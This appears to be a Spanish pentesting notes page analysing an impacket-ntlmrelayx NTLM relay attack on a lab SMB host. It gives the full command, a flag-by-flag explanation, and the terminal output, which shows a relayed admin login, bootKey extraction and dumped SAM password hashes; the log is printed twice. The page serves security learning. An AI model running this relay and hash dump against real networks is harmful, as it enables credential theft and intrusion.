Análisis de impacket-ntlmrelayx

Configuración del Ataque:
- El comando ejecutado impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249 configura un ataque de retransmisión NTLM.
- --no-http-server: Indica que no se debe iniciar un servidor HTTP para la retransmisión.
- -smb2support: Habilita el soporte para SMB versión 2.
- -t smb://10.0.1.249: Define el objetivo del ataque, en este caso, un servidor con la dirección IP 10.0.1.249 accesible a través del protocolo SMB.
Carga de Protocolos Cliente:
- La herramienta carga varios protocolos cliente, como DCSYNC, LDAPS, LDAP, IMAP(S), SMTP, HTTP(S), MSSQL, SMB y RPC. Esto significa que está preparada para retransmitir credenciales a través de cualquiera de estos protocolos.
Establecimiento de Servidores:
- Configura varios servidores, incluyendo SMB, WCF y un servidor RAW en el puerto 6666, para escuchar conexiones entrantes y posiblemente retransmitirlas.
Ataque de Retransmisión:
- Recibe una conexión desde 10.0.1.100 y autentica exitosamente contra el objetivo smb://10.0.1.249 como SPARTANCYBERSEC/ADMIN.
- Luego de controlar la conexión, indica que no hay más objetivos disponibles.
Explotación y Extracción de Hashes:
- La herramienta manipula servicios en el sistema objetivo, como iniciar el servicio RemoteRegistry.
- Extrae el bootKey del sistema objetivo, que es esencial para descifrar hashes almacenados localmente.
- Finalmente, vuelca los hashes del SAM (Security Accounts Manager) del sistema objetivo, incluyendo cuentas de usuario como Administrator, Guest, DefaultAccount, entre otras.

┌──(root㉿kali)-[/home/kali]
└─# impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.0.1.100, attacking target smb://10.0.1.249
[*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Done dumping SAM hashes for host: 10.0.1.249
[*] Stopping service RemoteRegistry

AnteriorUtilizando impacket-ntlmrelayx SiguienteCredenciales en descripcion

Última actualización hace 9 meses

¿Te fue útil?

┌──(root㉿kali)-[/home/kali] └─# impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249 Impacket v0.11.0 - Copyright 2023 Fortra [*] Protocol Client DCSYNC loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client RPC loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections [*] SMBD-Thread-4 (process_request_thread): Received connection from 10.0.1.100, attacking target smb://10.0.1.249 [*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMIN SUCCEED [*] SMBD-Thread-6 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left! [*] SMBD-Thread-7 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left! [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d::: prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f::: gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f::: demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f::: Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f::: [*] Done dumping SAM hashes for host: 10.0.1.249 [*] Stopping service RemoteRegistry